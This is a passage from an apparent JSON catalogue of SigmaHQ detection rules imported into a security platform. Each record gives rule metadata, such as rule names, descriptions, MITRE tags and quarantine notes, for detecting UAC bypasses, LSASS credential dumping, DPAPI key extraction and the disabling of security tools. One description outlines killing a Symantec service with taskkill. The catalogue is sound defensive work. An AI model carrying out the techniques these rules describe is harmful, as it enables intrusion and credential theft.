"rules/windows/process_creation/proc_creation_win_sysinternals_pssuspend_execution.yml" } }, { "id": "sigmahq-sigma-48bfd177-7cf2-412b-ad77-baf923489e82", "type": "detection", "name": "Potentially Suspicious Volume Shadow Copy Vsstrace.dll Load", "description": "Detects the image load of VSS DLL by uncommon executables", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-volume-shadow-copy-vsstrace-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly 
executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48bfd177-7cf2-412b-ad77-baf923489e82", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_dll_vsstrace_susp_load.yml" } }, { "id": "sigmahq-sigma-48d91a3a-2363-43ba-a456-ca71ac3da5c2", "type": "detection", "name": "Audit CVE Event", "description": "Detects events generated by user-mode applications when they call the CveEventWrite API to report an attempt to exploit a known vulnerability.\nMS started using this log in Jan. 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability).\nUnfortunately, that is about the only instance of CVEs being written to this log.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1203", "T1068", "T1211", "T1212", "T1210", "T1499.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/audit-cve-event.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48d91a3a-2363-43ba-a456-ca71ac3da5c2", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/microsoft-windows_audit_cve/win_audit_cve.yml" } }, { "id": "sigmahq-sigma-48ea844d-19b1-4642-944e-fe39c2cc1fec", "type": "detection", "name": "UAC Bypass Using IDiagnostic Profile - File", "description": "Detects the creation of a file by \"dllhost.exe\" in the System32 directory as part of the \"IDiagnosticProfileUAC\" UAC bypass technique", "version": "1.0.0", "author": "AiSOC", "tags": [ 
"categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-using-idiagnostic-profile-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_uac_bypass_idiagnostic_profile.yml" } }, { "id": "sigmahq-sigma-4916a35e-bfc4-47d0-8e25-a003d7067061", "type": "detection", "name": "Sysmon Driver Altitude Change", "description": "Detects changes in Sysmon driver altitude value.\nIf the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysmon-driver-altitude-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4916a35e-bfc4-47d0-8e25-a003d7067061", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_change_sysmon_driver_altitude.yml" } }, { "id": "sigmahq-sigma-4922a5dd-6743-4fc2-8e81-144374280997", "type": "detection", "name": 
"Flash Player Update from Suspicious Location", "description": "Detects a flashplayer update from an unofficial location", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1189", "T1204.002", "T1036.005" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/flash-player-update-from-suspicious-location.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4922a5dd-6743-4fc2-8e81-144374280997", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/web/proxy_generic/proxy_susp_flash_download_loc.yml" } }, { "id": "sigmahq-sigma-4931188c-178e-4ee7-a348-39e8a7a56821", "type": "detection", "name": "Filter Driver Unloaded Via Fltmc.EXE", "description": "Detect filter driver unloading activity via fltmc.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1070", "T1685", "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/filter-driver-unloaded-via-fltmc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4931188c-178e-4ee7-a348-39e8a7a56821", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fltmc_unload_driver.yml" } }, { "id": 
"sigmahq-sigma-49329257-089d-46e6-af37-4afce4290685", "type": "detection", "name": "HackTool - SharpEvtMute DLL Load", "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtMute, a tool that tampers with the Windows event logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sharpevtmute-dll-load.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49329257-089d-46e6-af37-4afce4290685", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_hktl_sharpevtmute.yml" } }, { "id": "sigmahq-sigma-493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "type": "detection", "name": "WMI Event Consumer Created Named Pipe", "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wmi-event-consumer-created-named-pipe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", 
"upstream_path": "rules/windows/pipe_created/pipe_created_scrcons_wmi_consumer_namedpipe.yml" } }, { "id": "sigmahq-sigma-496a0e47-0a33-4dca-b009-9e6ca3591f39", "type": "detection", "name": "Suspicious Kerberos RC4 Ticket Encryption", "description": "Detects service ticket requests using RC4 encryption type", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-kerberos-rc4-ticket-encryption.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "496a0e47-0a33-4dca-b009-9e6ca3591f39", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" } }, { "id": "sigmahq-sigma-4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "type": "detection", "name": "Credential Dumping Tools Service Execution - System", "description": "Detects well-known credential dumping tools execution via service execution events", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001", "T1003.002", "T1003.004", "T1003.005", "T1003.006", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/credential-dumping-tools-service-execution-system.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": 
"4976aa50-8f41-45c6-8b15-ab3fc10e79ed", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_mal_creddumper.yml" } }, { "id": "sigmahq-sigma-4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", "type": "detection", "name": "AWS Glue Development Endpoint Activity", "description": "Detects possible suspicious glue development endpoint activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-glue-development-endpoint-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_passed_role_to_glue_development_endpoint.yml" } }, { "id": "sigmahq-sigma-49a268a4-72f4-4e38-8a7b-885be690c5b5", "type": "detection", "name": "User Added To Privilege Role", "description": "Detects when a user is added to a privileged role.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1078.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-privilege-role.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "49a268a4-72f4-4e38-8a7b-885be690c5b5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_priviledged_role_assignment_add.yml" } }, { "id": "sigmahq-sigma-49aae26c-450e-448b-911d-b3c13d178dfc", "type": "detection", "name": "Linux Keylogging with Pam.d", "description": "Detect attempt to enable auditing of TTY input", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003", "T1056.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/linux-keylogging-with-pam-d.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49aae26c-450e-448b-911d-b3c13d178dfc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/lnx_auditd_keylogging_with_pam_d.yml" } }, { "id": "sigmahq-sigma-49be8799-7b4d-4fda-ad23-cafbefdebbc5", "type": "detection", "name": "Use of Wfc.exe", "description": "The Workflow Command-line Compiler can be used for AWL bypass and is listed in Microsoft's recommended block rules.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-wfc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", 
"provenance": { "source": "SigmaHQ/sigma", "source_id": "49be8799-7b4d-4fda-ad23-cafbefdebbc5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_wfc.yml" } }, { "id": "sigmahq-sigma-49d9671b-0a0a-4c09-8280-d215bfd30662", "type": "detection", "name": "Application Terminated Via Wmic.EXE", "description": "Detects calls to the \"terminate\" function via wmic in order to kill an application", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/application-terminated-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49d9671b-0a0a-4c09-8280-d215bfd30662", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_terminate_application.yml" } }, { "id": "sigmahq-sigma-49e5bc24-8b86-49f1-b743-535f332c2856", "type": "detection", "name": "Microsoft Defender Tamper Protection Trigger", "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": 
"detections/sigma-imports/endpoint/microsoft-defender-tamper-protection-trigger.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49e5bc24-8b86-49f1-b743-535f332c2856", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/windefend/win_defender_tamper_protection_trigger.yml" } }, { "id": "sigmahq-sigma-49f2f17b-b4c8-4172-a68b-d5bf95d05130", "type": "detection", "name": "UAC Bypass via ICMLuaUtil", "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uac-bypass-via-icmluautil.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" } }, { "id": "sigmahq-sigma-49f5dfc1-f92e-4d34-96fa-feba3f6acf36", "type": "detection", "name": "Disabling Security Tools - Builtin", "description": "Detects disabling security tools", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1686" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/disabling-security-tools-builtin.yaml", 
"quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "49f5dfc1-f92e-4d34-96fa-feba3f6acf36", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/builtin/syslog/lnx_syslog_security_tools_disabling_syslog.yml" } }, { "id": "sigmahq-sigma-4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "type": "detection", "name": "Renamed ProcDump Execution", "description": "Detects the execution of a renamed ProcDump executable.\nThis often done by attackers or malware in order to evade defensive mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-procdump-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml" } }, { "id": "sigmahq-sigma-4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "type": "detection", "name": "Potentially Suspicious AccessMask Requested From LSASS", "description": "Detects process handle on LSASS process with certain access mask", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, 
"source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-accessmask-requested-from-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" } }, { "id": "sigmahq-sigma-4a241dea-235b-4a7e-8d76-50d817b146c4", "type": "detection", "name": "Suspicious PowerShell Mailbox Export to Share - PS", "description": "Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-powershell-mailbox-export-to-share-ps.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a241dea-235b-4a7e-8d76-50d817b146c4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" } }, { "id": "sigmahq-sigma-4a2a2c3e-209f-4d01-b513-4155a540b469", "type": "detection", "name": "Suspicious MsiExec Embedding Parent", "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", "version": "1.0.0", 
"author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.007" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-msiexec-embedding-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a2a2c3e-209f-4d01-b513-4155a540b469", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msiexec_embedding.yml" } }, { "id": "sigmahq-sigma-4a30ac0c-b9d6-4e01-b71a-5f851bbf4259", "type": "detection", "name": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1", "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-defense-evasion-activity-via-emoji-usage-in-commandline-1.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a30ac0c-b9d6-4e01-b71a-5f851bbf4259", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_1.yml" } }, { "id": "sigmahq-sigma-4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "type": 
"detection", "name": "PowerShell as a Service in Registry", "description": "Detects that a powershell code is written to the registry as a service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-as-a-service-in-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" } }, { "id": "sigmahq-sigma-4a6713f6-3331-11ed-a261-0242ac120002", "type": "detection", "name": "Taskkill Symantec Endpoint Protection", "description": "Detects one of the possible scenarios for disabling Symantec Endpoint Protection.\nSymantec Endpoint Protection antivirus software services incorrectly implement the protected service mechanism.\nAs a result, the NT AUTHORITY/SYSTEM user can execute the taskkill /im command several times ccSvcHst.exe /f, thereby killing the process belonging to the service, and thus shutting down the service.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/taskkill-symantec-endpoint-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { 
"source": "SigmaHQ/sigma", "source_id": "4a6713f6-3331-11ed-a261-0242ac120002", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" } }, { "id": "sigmahq-sigma-4aa6040b-3f28-44e3-a769-9208e5feb5ec", "type": "detection", "name": "Suspicious Rundll32 Execution With Image Extension", "description": "Detects the execution of Rundll32.exe with DLL files masquerading as image files", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-rundll32-execution-with-image-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4aa6040b-3f28-44e3-a769-9208e5feb5ec", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_rundll32_susp_execution_with_image_extension.yml" } }, { "id": "sigmahq-sigma-4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "type": "detection", "name": "Writing Local Admin Share", "description": "Aversaries may use to interact with a remote network share using Server Message Block (SMB).\nThis technique is used by post-exploitation frameworks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/writing-local-admin-share.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4aafb0fa-bff5-4b9d-b99e-8093e659c65f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_writing_local_admin_share.yml" } }, { "id": "sigmahq-sigma-4abc0ec4-db5a-412f-9632-26659cddf145", "type": "detection", "name": "UEFI Persistence Via Wpbbin - ProcessCreation", "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1542.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uefi-persistence-via-wpbbin-processcreation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4abc0ec4-db5a-412f-9632-26659cddf145", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wpbbin_potential_persistence.yml" } }, { "id": "sigmahq-sigma-4ac1f50b-3bd0-4968-902d-868b4647937e", "type": "detection", "name": "DPAPI Domain Backup Key Extraction", "description": "Detects tools extracting LSA secret DPAPI domain backup key from Domain Controllers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": 
"_quarantine", "mitre_techniques": [ "T1003.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dpapi-domain-backup-key-extraction.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ac1f50b-3bd0-4968-902d-868b4647937e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_dpapi_domain_backupkey_extraction.yml" } }, { "id": "sigmahq-sigma-4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "type": "detection", "name": "TrustedPath UAC Bypass Pattern", "description": "Detects indicators of a UAC bypass method by mocking directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/trustedpath-uac-bypass-pattern.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "4ac47ed3-44c2-4b1f-9d51-bf46e8914126", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml" } }, { "id": "sigmahq-sigma-4ad97bf5-a514-41a4-abd3-4f3455ad4865", "type": "detection", "name": "Guest Users Invited To Tenant By Non Approved Inviters", "description": "Detects guest users being invited to tenant by non-approved inviters", "version": "1.0.0", 
